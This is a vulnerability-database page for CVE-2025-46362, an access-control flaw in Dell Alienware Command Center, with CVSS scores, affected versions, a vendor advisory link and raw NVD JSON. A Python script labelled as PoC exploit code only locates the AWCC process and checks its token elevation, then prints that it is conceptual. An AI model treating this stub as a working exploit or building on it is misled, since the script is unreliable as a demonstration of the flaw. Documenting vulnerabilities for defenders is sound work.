Security Vulnerability Report
中文
CVE-2025-46362 CVSS 6.6 MEDIUM

CVE-2025-46362

Published: 2025-11-13 20:15:50
Last Modified: 2025-11-17 12:28:16

Description

Dell Alienware Command Center 6.x (AWCC), versions prior to 6.10.15.0, contain an Improper Access Control vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information Tampering.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:dell:alienware_command_center:*:*:*:*:*:*:*:* - VULNERABLE
Dell Alienware Command Center (AWCC) < 6.10.15.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-46362 PoC - Dell Alienware Command Center Improper Access Control Note: This is a conceptual PoC for educational purposes only. """ import os import sys import ctypes from ctypes import wintypes # Windows API definitions PROCESS_ALL_ACCESS = 0x1F0FFF TOKEN_QUERY = 0x0008 TokenElevation = 20 def get_process_token_elevation(pid): """Check if a process is running with elevated privileges.""" try: h_process = ctypes.windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid) if not h_process: return False h_token = ctypes.c_void_p() ctypes.windll.advapi32.OpenProcessToken( h_process, TOKEN_QUERY, ctypes.byref(h_token) ) elevation = wintypes.BOOL() returned_size = wintypes.DWORD() ctypes.windll.advapi32.GetTokenInformation( h_token, TokenElevation, ctypes.byref(elevation), ctypes.sizeof(elevation), ctypes.byref(returned_size) ) ctypes.windll.kernel32.CloseHandle(h_process) ctypes.windll.kernel32.CloseHandle(h_token) return bool(elevation.value) except Exception as e: print(f"[-] Error checking elevation: {e}") return False def find_awcc_process(): """Find Alienware Command Center process.""" import psutil for proc in psutil.process_iter(['pid', 'name']): if 'AWCC' in proc.info['name'] or 'Alienware' in proc.info['name']: return proc.info['pid'], proc.info['name'] return None, None def exploit_cve_2025_46362(): """ Conceptual exploitation of CVE-2025-46362. This vulnerability allows low-privileged users to access AWCC functions that should require higher privileges. """ print("[*] CVE-2025-46362 PoC - Dell AWCC Improper Access Control") print("[*] Target: Dell Alienware Command Center < 6.10.15.0") # Find AWCC process pid, name = find_awcc_process() if pid: print(f"[+] Found AWCC process: {name} (PID: {pid})") # Check if running elevated is_elevated = get_process_token_elevation(pid) print(f"[+] Process elevated: {is_elevated}") # The vulnerability allows low-priv users to manipulate AWCC settings # This would involve: # 1. Accessing AWCC inter-process communication channels # 2. Manipulating AWCC configuration files # 3. Exploiting improper permission checks on privileged functions print("[*] Attempting to access protected AWCC functions...") print("[-] This is a conceptual demonstration only.") else: print("[-] AWCC process not found. Is the software installed?") if __name__ == "__main__": exploit_cve_2025_46362()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46362", "sourceIdentifier": "[email protected]", "published": "2025-11-13T20:15:49.507", "lastModified": "2025-11-17T12:28:15.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Alienware Command Center 6.x (AWCC), versions prior to 6.10.15.0, contain an Improper Access Control vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information Tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:alienware_command_center:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.10.15.0", "matchCriteriaId": "B4F88A51-8AAC-456E-9817-C159C81ACC20"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000379467/dsa-2025-392", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}